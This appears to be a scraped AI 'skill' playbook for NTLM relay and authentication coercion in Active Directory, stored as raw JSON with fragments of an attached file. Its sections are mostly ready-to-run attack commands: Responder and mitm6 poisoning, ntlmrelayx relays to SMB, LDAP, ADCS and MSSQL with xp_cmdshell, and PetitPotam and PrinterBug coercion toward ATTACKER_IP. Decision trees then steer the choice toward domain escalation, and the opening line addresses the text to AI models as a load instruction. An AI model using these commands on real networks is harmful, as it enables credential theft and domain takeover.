SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook AI LOAD INSTRUCTION : Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-certificate-services for ESC8 (relay to ADCS enrollment) - active-directory-acl-abuse for ACL modification via LDAP relay (RBCD, shadow creds) - activ…

:'pass'\n```\n\n### Combo 2: PrinterBug + Unconstrained Delegation\n\n```bash\n# On compromised host with unconstrained delegation:\nRubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$\n\n# Trigger from anywhere:\nprinterbug.py DOMAIN/user:pass@DC01 UNCONSTRAINED_HOST\n\n# Capture DC01$ TGT → DCSync\n```\n\n### Combo 3: PetitPotam + ADCS Relay (ESC8)\n\n```bash\n# Terminal 1: Relay to ADCS\nntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \\\n --adcs --template DomainController\n\n# Terminal 2: Coerce DC\nPetitPotam.py ATTACKER_IP DC01_IP\n\n# Result: Certificate for DC01$ → authenticate → DCSync\ncertipy auth -pfx dc01.pfx -dc-ip DC02_IP\n```\n\n### Combo 4: mitm6 + LDAP Relay → Shadow Credentials\n\n```bash\n# Terminal 1: mitm6 DNS takeover\nmitm6 -d domain.com\n\n# Terminal 2: Relay to LDAP with shadow credentials\nntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --shadow-credentials -smb2support\n\n# Result: Shadow credential added on victim machine → PKINIT auth\n```\n\n### Combo 5: WebDAV Coercion + LDAP Relay (Bypass SMB Signing)\n\n```bash\n# Terminal 1: Start relay\nntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support\n\n# Terminal 2: Coerce via WebDAV (HTTP-based, no SMB signing issue)\nPetitPotam.py ATTACKER@80/test WORKSTATION_IP\n# Workstation's WebClient service sends HTTP-based NTLM → clean relay\n```\n\n---\n\n## 8. COERCION METHOD SELECTION TREE\n\n```\nNeed to coerce authentication\n│\n├── Target is a Domain Controller?\n│ ├── PetitPotam (unauthenticated if unpatched)\n│ ├── PetitPotam (authenticated — most reliable)\n│ ├── DFSCoerce (if DFS role installed)\n│ └── PrinterBug (if Spooler running — rare on modern DCs)\n│\n├── Target is a file server?\n│ ├── ShadowCoerce (if FSRVP agent running)\n│ ├── PetitPotam (authenticated)\n│ └── PrinterBug (if Spooler running)\n│\n├── Target is a workstation?\n│ ├── PrinterBug (Spooler usually running)\n│ ├── PetitPotam (authenticated)\n│ └── WebDAV coercion (if WebClient running — HTTP-based!)\n│\n├── No creds available?\n│ ├── PetitPotam unauthenticated (unpatched systems only)\n│ ├── Responder poisoning (passive capture)\n│ └── mitm6 (DHCPv6 DNS takeover)\n│\n├── Need HTTP-based NTLM (bypass SMB signing)?\n│ ├── WebDAV coercion from workstation\n│ └── mitm6 WPAD trigger\n│\n└── Not sure what works?\n └── Use Coercer tool: coercer scan -t TARGET\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":7546,"content_sha256":"6a2528446d25d32390ed55416f58fbb1483e21df589920a012cd20ee4d577ac2"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"AI LOAD INSTRUCTION","type":"text","marks":[{"type":"strong"}]},{"text":": Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"0. RELATED ROUTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Before going deep, consider loading:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-certificate-services","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-certificate-services/SKILL.md","title":null}}]},{"text":" for ESC8 (relay to ADCS enrollment)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-acl-abuse","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-acl-abuse/SKILL.md","title":null}}]},{"text":" for ACL modification via LDAP relay (RBCD, shadow creds)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-kerberos-attacks","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-kerberos-attacks/SKILL.md","title":null}}]},{"text":" for Kerberos attacks after relay success","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"windows-lateral-movement","type":"text","marks":[{"type":"link","attrs":{"href":"../windows-lateral-movement/SKILL.md","title":null}}]},{"text":" for post-relay lateral movement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Advanced Reference","type":"text"}]},{"type":"paragraph","content":[{"text":"Also load ","type":"text"},{"text":"COERCION_METHODS.md","type":"text","marks":[{"type":"link","attrs":{"href":"./COERCION_METHODS.md","title":null}}]},{"text":" when you need:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detailed coercion method comparison (PetitPotam, PrinterBug, DFSCoerce, etc.)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"RPC function-level details and prerequisites","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Coercer tool usage and discovery","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"1. NTLM RELAY FUNDAMENTALS","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Victim Attacker (relay) Target\n │ │ │\n │── NTLM Auth ──→│ │ (1) Victim authenticates (coerced/poisoned)\n │ │── Forward Auth ─────→│ (2) Attacker relays to target\n │ │←─ Challenge ──────── │ (3) Target sends challenge\n │←─ Challenge ────│ │ (4) Attacker forwards challenge to victim\n │── Response ────→│ │ (5) Victim computes response\n │ │── Forward Response ─→│ (6) Attacker relays response to target\n │ │←─ Authenticated! ────│ (7) Target accepts → attacker has session","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"NTLMv1 vs NTLMv2","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Feature","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NTLMv1","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NTLMv2","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Security","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Weak (crackable to NTLM hash)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Stronger (but still relayable)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Relay","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Yes","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Yes","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Crack to hash","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Yes (rainbow tables, crack.sh)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Offline brute-force only","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Downgrade","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Force via Responder ","type":"text"},{"text":"--lm","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Default in modern Windows","type":"text"}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"2. RELAY TARGET MATRIX","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Target Protocol","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"What You Get","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Signing Required by Default?","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"EPA/Channel Binding?","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SMB","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Command exec (if admin), file access","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"DCs: Yes","type":"text","marks":[{"type":"strong"}]},{"text":", Workstations: No","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LDAP","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ACL modification, RBCD, shadow creds, add computer","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"DCs: No","type":"text","marks":[{"type":"strong"}]},{"text":" (negotiated)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No (unless configured)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LDAPS","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Same as LDAP but encrypted","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Yes","type":"text","marks":[{"type":"strong"}]},{"text":" (channel binding)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"HTTP (ADCS)","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Certificate enrollment (ESC8)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Depends on config","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"MSSQL","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SQL queries, xp_cmdshell","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"IMAP/SMTP","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Email access","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"RPC","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Various (CA enrollment for ESC11)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Depends","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Signing Check","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check SMB signing on target\ncrackmapexec smb TARGET_IP --gen-relay-list relay_targets.txt\n# Outputs hosts WITHOUT required SMB signing\n\n# Nmap SMB signing check\nnmap -p 445 --script smb2-security-mode TARGET_RANGE","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"3. RESPONDER — CREDENTIAL CAPTURE","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"LLMNR/NBT-NS/WPAD/mDNS Poisoning","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Start Responder (capture mode — don't relay, just capture hashes)\nresponder -I eth0 -dwP\n\n# Analyze mode (passive, no poisoning)\nresponder -I eth0 -A\n\n# Key protocols poisoned:\n# LLMNR (UDP 5355) — Link-Local Multicast Name Resolution\n# NBT-NS (UDP 137) — NetBIOS Name Service\n# WPAD — Web Proxy Auto-Discovery (proxy config)\n# mDNS (UDP 5353) — Multicast DNS","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Responder + Relay (Don't Capture, Relay Instead)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Disable HTTP and SMB servers in Responder (ntlmrelayx will handle them)\n# Edit /etc/responder/Responder.conf: set HTTP and SMB to Off\n\n# Start Responder for poisoning only\nresponder -I eth0 -dwP\n\n# Start ntlmrelayx for relay\nntlmrelayx.py -tf targets.txt -smb2support","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"4. NTLMRELAYX — RELAY EXECUTION","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Relay to SMB (Admin Execution)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Execute command on targets (requires admin privs on target)\nntlmrelayx.py -tf targets.txt -smb2support -c \"whoami\"\n\n# Dump SAM hashes\nntlmrelayx.py -tf targets.txt -smb2support\n\n# Interactive SOCKS proxy (maintain sessions)\nntlmrelayx.py -tf targets.txt -smb2support -socks\n# Then: proxychains smbclient //TARGET/C$ -U DOMAIN/user","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Relay to LDAP (ACL Modification)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Automatic RBCD (delegate-access)\nntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support\n\n# Escalate via shadow credentials\nntlmrelayx.py -t ldap://DC_IP --shadow-credentials -smb2support\n\n# Add computer account\nntlmrelayx.py -t ldap://DC_IP --add-computer FAKE01 P@ss123 -smb2support\n\n# Dump domain info\nntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Relay to ADCS HTTP (ESC8)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \\\n --adcs --template DomainController\n\n# Use with coercion to relay DC auth → get DC certificate","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Relay to MSSQL","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q \"SELECT system_user; EXEC xp_cmdshell 'whoami'\"","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"5. MITM6 — IPv6 DNS TAKEOVER","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# mitm6 exploits IPv6 auto-configuration to become DNS server\nmitm6 -d domain.com\n\n# Combined with ntlmrelayx\nntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --delegate-access -smb2support\n\n# Flow:\n# 1. mitm6 sends DHCPv6 replies → victim gets attacker as IPv6 DNS\n# 2. Victim queries WPAD → attacker responds\n# 3. NTLM auth triggered → relayed to LDAP\n# 4. RBCD or shadow credentials set on victim computer","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"6. CROSS-PROTOCOL RELAY","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"SMB → LDAP","type":"text"}]},{"type":"paragraph","content":[{"text":"Capture SMB authentication, relay to LDAP (requires no LDAP signing enforcement).","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Coerce SMB auth from DC, relay to LDAP on same or different DC\nntlmrelayx.py -t ldap://DC02_IP --delegate-access -smb2support\n\n# Trigger coercion (attacker receives SMB auth)\nPetitPotam.py ATTACKER_IP DC01_IP","type":"text"}]},{"type":"paragraph","content":[{"text":"Limitation","type":"text","marks":[{"type":"strong"}]},{"text":": SMB → LDAP relay fails if the source uses SMB signing negotiation that indicates relay.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"WebDAV → LDAP","type":"text"}]},{"type":"paragraph","content":[{"text":"WebDAV from workstations sends NTLM over HTTP → relay to LDAP (no signing issues).","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# WebDAV coercion sends HTTP-based NTLM (no SMB signing concern)\nntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support\n\n# Coerce via WebDAV (workstation must have WebClient service running)\n# Use @ATTACKER_PORT format to force WebDAV\nPetitPotam.py ATTACKER@80/test WORKSTATION_IP","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"7. WEBDAV-BASED COERCION","type":"text"}]},{"type":"paragraph","content":[{"text":"WebClient service (WebDAV) converts SMB-type coercion to HTTP-based NTLM.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check if WebClient is running (port 80 listener or service query)\ncrackmapexec smb TARGET -u user -p pass -M webdav\n\n# Start WebDAV coercion (from workstation, not server)\n# Force target to authenticate via HTTP:\n# Use UNC path format: \\\\ATTACKER@PORT\\share","type":"text"}]},{"type":"paragraph","content":[{"text":"Key advantage","type":"text","marks":[{"type":"strong"}]},{"text":": HTTP-based NTLM avoids SMB signing requirements.","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"8. NTLM RELAY DECISION TREE","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Want to relay NTLM authentication\n│\n├── What auth can you capture?\n│ ├── Responder poisoning (passive, wait for queries)\n│ ├── mitm6 (DHCPv6 DNS takeover, periodic)\n│ └── Active coercion → load COERCION_METHODS.md\n│\n├── What target to relay to?\n│ │\n│ ├── Need code execution?\n│ │ ├── SMB target without signing → ntlmrelayx to SMB (§4)\n│ │ └── MSSQL target → ntlmrelayx to MSSQL + xp_cmdshell (§4)\n│ │\n│ ├── Need domain escalation?\n│ │ ├── LDAP signing not enforced?\n│ │ │ ├── Relay to LDAP → RBCD (§4)\n│ │ │ ├── Relay to LDAP → shadow credentials (§4)\n│ │ │ └── Relay to LDAP → add computer + delegate (§4)\n│ │ └── LDAP signing enforced?\n│ │ └── Relay to ADCS HTTP (ESC8) → certificate (§4)\n│ │\n│ └── Need certificate?\n│ └── Relay to ADCS HTTP/RPC → ESC8/ESC11 (§4)\n│\n├── Source is SMB-based?\n│ ├── Target is SMB → check signing (§2)\n│ ├── Target is LDAP → may work (cross-protocol, §6)\n│ └── Target is HTTP → works (cross-protocol)\n│\n├── Source is HTTP-based (WebDAV)?\n│ └── Relay to any target (no signing issues, §6/§7)\n│\n└── Relay fails?\n ├── Check signing requirements (§2)\n ├── Check EPA/channel binding\n ├── Try cross-protocol (SMB → LDAP)\n └── Try WebDAV coercion (avoids SMB signing)","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"ntlm-relay-coercion","author":"@skillopedia","source":{"stars":853,"repo_name":"hack-skills","origin_url":"https://github.com/yaklang/hack-skills/blob/HEAD/skills/ntlm-relay-coercion/SKILL.md","repo_owner":"yaklang","body_sha256":"81c5aff527aa449e608dc231c794bef6b56ce8bd2e6696363ecd39422dee18a9","cluster_key":"386827d70565ff574383e85cd9d8b50e262d9c42da8891dd2608ca8e2fa25bc0","clean_bundle":{"format":"clean-skill-bundle-v1","source":"yaklang/hack-skills/skills/ntlm-relay-coercion/SKILL.md","attachments":[{"id":"918e78c0-8fcf-5cd9-9b93-89573b944431","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/918e78c0-8fcf-5cd9-9b93-89573b944431/attachment.md","path":"COERCION_METHODS.md","size":7546,"sha256":"6a2528446d25d32390ed55416f58fbb1483e21df589920a012cd20ee4d577ac2","contentType":"text/markdown; charset=utf-8"}],"bundle_sha256":"bb7cc8edfdd12213bd94ccb6bf733835836d4d01dc5dbf6b1f2c3cc884c03b6e","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/ntlm-relay-coercion/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"data-analytics","category_label":"Data"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"data-analytics","import_tag":"clean-skills-v1","description":"NTLM relay and authentication coercion playbook. Use when capturing and relaying NTLM authentication to escalate privileges via SMB, LDAP, HTTP, or MSSQL relay targets, combined with PetitPotam, PrinterBug, and other coercion methods."}},"renderedAt":1782981670776}

SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook AI LOAD INSTRUCTION : Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-certificate-services for ESC8 (relay to ADCS enrollment) - active-directory-acl-abuse for ACL modification via LDAP relay (RBCD, shadow creds) - activ…